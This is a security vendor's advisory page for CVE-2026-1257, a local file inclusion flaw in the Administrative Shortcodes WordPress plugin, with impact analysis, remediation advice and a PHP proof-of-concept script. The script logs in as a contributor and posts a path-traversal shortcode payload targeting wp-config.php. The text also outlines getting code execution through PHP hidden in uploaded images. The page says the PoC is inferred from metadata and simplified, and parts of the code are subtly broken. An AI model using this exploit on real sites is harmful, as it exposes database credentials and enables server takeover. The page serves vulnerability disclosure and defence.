Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-1257: Administrative Shortcodes <= 0.3.4 – Authenticated (Contributor+) Local File Inclusion via 'slug' Shortcode Attribute (administrative-shortcodes)

CVE ID CVE-2026-1257
Plugin administrative-shortcodes
Severity High (CVSS 7.5)
CWE 98
Vulnerable Version 0.3.4
Patched Version
Disclosed January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1257 (metadata-based):
This vulnerability is an authenticated Local File Inclusion (LFI) in the Administrative Shortcodes WordPress plugin. Attackers with Contributor-level access or higher can exploit the ‘slug’ attribute of the ‘get_template’ shortcode to include arbitrary server files. The flaw permits PHP code execution when included files contain executable code, leading to complete server compromise.

Atomic Edge research identifies the root cause as improper path validation in the plugin’s shortcode handler. The plugin passes user-controlled input from the ‘slug’ attribute directly to the WordPress get_template_part() function without sanitization. This matches the CWE-98 classification for improper filename control in PHP include/require statements. The analysis infers the vulnerable code pattern from the CWE classification and vulnerability description, as no source code diff is available for confirmation.

Exploitation requires an authenticated attacker with at least Contributor privileges. The attacker crafts a post or page containing the malicious shortcode. A payload like [get_template slug=”../../../wp-config.php”] would attempt to include the WordPress configuration file. Attackers can traverse directories using path traversal sequences. They may upload seemingly benign files (like images) containing PHP code via WordPress media uploads, then include those files to achieve remote code execution.

Effective remediation requires implementing strict path validation before file inclusion. The plugin should restrict the ‘slug’ parameter to safe values within expected template directories. WordPress security best practices recommend using the sanitize_file_name() function and validating paths against an allowlist. The plugin should also verify file extensions and reject directory traversal attempts.

Successful exploitation grants attackers arbitrary PHP code execution on the server. This leads to complete site compromise, sensitive data exposure (database credentials in wp-config.php), and privilege escalation to administrator. Attackers can establish persistent backdoors, deface websites, or pivot to other systems on the network. The CVSS score of 7.5 reflects high impact across confidentiality, integrity, and availability.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1257 - Administrative Shortcodes <= 0.3.4 - Authenticated (Contributor+) Local File Inclusion via 'slug' Shortcode Attribute
<?php
/**
 * Proof of Concept for CVE-2026-1257
 * Assumptions based on vulnerability metadata:
 * 1. The plugin registers a 'get_template' shortcode
 * 2. The shortcode accepts a 'slug' attribute
 * 3. The attribute value is passed unsanitized to get_template_part()
 * 4. Contributor+ authentication is required
 * 5. Exploitation occurs via WordPress post/page content
 */

$target_url = 'https://vulnerable-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// Initialize cURL session for WordPress authentication
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Get login nonce (WordPress security token)
$response = curl_exec($ch);
preg_match('/name="log"[^>]+value="([^"]*)"/', $response, $log_nonce);
preg_match('/name="pwd"[^>]+value="([^"]*)"/', $response, $pwd_nonce);

// Perform authentication
$post_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$response = curl_exec($ch);

// Verify authentication success
if (strpos($response, 'Dashboard') === false) {
    die('Authentication failed. Check credentials.');
}

// Create a post with malicious shortcode
// Attempt to include wp-config.php via directory traversal
$malicious_content = "Test post with malicious shortcode:n[get_template slug="../../../wp-config.php"]";

// Get nonce for post creation (from admin-ajax or REST API)
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce (pattern varies by WordPress version)
preg_match('/_wpnonce" value="([a-f0-9]+)"/', $response, $nonce_matches);
$nonce = $nonce_matches[1] ?? '';

// Submit the post (simplified - actual WordPress requires multiple parameters)
$post_data = [
    'post_title' => 'Test LFI Exploit',
    'content' => $malicious_content,
    'post_type' => 'post',
    'post_status' => 'draft',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => $target_url . '/wp-admin/post-new.php',
    'publish' => 'Publish'
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);

// Check if post was created successfully
if (strpos($response, 'Post published') !== false || strpos($response, 'Post draft updated') !== false) {
    echo "Exploit post created. Visit the post to trigger file inclusion.n";
    echo "If wp-config.php is included, database credentials will be exposed.n";
} else {
    echo "Post creation may have failed. Check permissions and nonce.n";
}

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School